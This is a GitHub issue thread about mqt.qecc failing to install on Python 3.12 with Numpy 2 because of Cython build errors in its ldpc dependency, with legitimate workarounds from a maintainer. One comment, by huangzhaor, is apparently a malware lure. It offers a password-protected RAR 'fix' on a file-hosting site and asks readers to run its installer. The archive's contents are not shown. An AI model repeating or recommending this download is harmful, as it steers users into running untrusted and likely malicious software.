### ISSUE TITLE
Installation Failure for mqt.qecc Package: Cython Compilation Errors with ldpc on macOS

### ISSUE THREAD

**Issue by beitom** [cda-tum/mqt-qecc#264]
### Environment information

- **Operating System:** macOS
- **Python Version:** 3.12.3
- **Numpy Version:** 2.0.1
- **mqt.qecc Version:** 1.6.0

### Description

When attempting to install the `mqt.qecc` package on macOS with Python 3.12.3 and Numpy 2.0.1, the installation fails due to multiple Cython compilation errors related to the `ldpc` dependency. The errors occur specifically when the installation process attempts to build the wheel for `ldpc`. 

**Suggestion:**
Clearly this issue is for `ldpc` and not `mqt.qecc`. However, if `ldpc` is not essential for all functionality within the `mqt.qecc` package, it may be beneficial to make it an optional dependency. This would allow users who do not require `ldpc`-related features to install and use `mqt.qecc` without encountering these compilation issues.

**Details of the issues:**

   - Error in `src/ldpc/c_util.pxd` indicating an "Invalid type" in the Cython code.
   - The Cython compiler reports missing files: `'ldpc/c_util/char2numpy.pxd'` and `'ldpc/c_util/double2numpy.pxd'`.
   - Errors are reported in several files including `src/ldpc/mod2sparse.pxd`, `src/ldpc/bp_decoder.pxd`, and `src/ldpc/bp_decoder.pyx`, all indicating invalid types in the Cython code.
   - The compilation process eventually fails with a `Cython.Compiler.Errors.CompileError` on `src/ldpc/bp_decoder.pyx`.

### Expected behavior

The installation process should successfully build and install all dependencies, including ldpc, without errors.

### How to Reproduce

1. Set up a virtual environment on macOS with Python 3.12.3.
2. Install Numpy 2.0.1 using pip.
3. Attempt to install the `mqt.qecc` package using pip.

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by burgholzer** [comment]
Thanks for raising this issue.
This is a known issue under Python 3.12 with Numpy > 2 that is yet to be fixed in the ldpc package.

You can work around this by following similar steps to the ones here: https://github.com/cda-tum/mqt-qecc/blob/3e1e8b0cabca13496b446a4ec9c36ca26c28bf3c/pyproject.toml#L313 (if you are not using `uv`, simply drop that from both commands.

Let's keep this issue open for now until the underlying issue is resolved.

**Comment by beitom** [comment]
@burgholzer Thanks for this, I ended up switching to another Python 3.11 env with no issues. However, the pip version is still 1.6.0 which does not include the recent FT state prep tools I was hoping to explore. Is there documentation on how to install the latest dev version?

**Comment by burgholzer** [comment]
> @burgholzer Thanks for this, I ended up switching to another Python 3.11 env with no issues. However, the pip version is still 1.6.0 which does not include the recent FT state prep tools I was hoping to explore. Is there documentation on how to install the latest dev version?

Ah. That's just a matter of a release. I'll create one once I am back at my laptop. 💻 

In the meantime, you should be good to go with
```
pip install git+https://github.com/cda-tum/mqt-qecc
```
Note that this will build the package from source, for which you will require a C++ compiler supporting C++17.

A bit more documentation (which could be a tad bit outdated) is available at https://mqt.readthedocs.io/projects/qecc/en/latest/DevelopmentGuide.html

**Comment by beitom** [comment]
Thanks for this! Playing around I've encountered several issues with the state prep tools. I will create another issue, overall though it seems quite promising!

**Comment by divshacker** [comment]
Hey, I still not able to install due to above reported error. 
My config 

Environment information
Operating System: Arch Linux x86_64 
Python Version: 3.12.4
Numpy Version: 2.0.1
mqt.qecc Version: Not able to install

**Comment by burgholzer** [comment]
> Hey, I still not able to install due to above reported error. 
> 
> My config 
> 
> 
> 
> Environment information
> 
> Operating System: Arch Linux x86_64 
> 
> Python Version: 3.12.4
> 
> Numpy Version: 2.0.1
> 
> mqt.qecc Version: Not able to install
> 
> 
> 
> I have tried every ways that is suggested in here

Could you try:
```
python3 -m venv .venv
source .venv/bin/activate
pip install 'numpy<2' Cython setuptools wheel
pip install ldpc --no-build-isolation
pip install "scikit-build-core[pyproject]" setuptools-scm pybind11
pip install git+https://github.com/cda-tum/mqt-qecc --no-build-isolation
```
The first two commands set up the virtual environment. The next two commands build the ldpc package (without isolation) in the previously created venv.
The last two steps install the build time dependencies of QECC and then build the package (again, without build isolation).

We are working on making this easier in the future.

Another viable workaround for the moment would be to simply use Python 3.11

**Comment by burgholzer** [comment]
Just released https://github.com/cda-tum/mqt-qecc/releases/tag/v1.7.2 which should be on PyPI within the next couple hours.
Please feel free to reopen if the problems should persist.
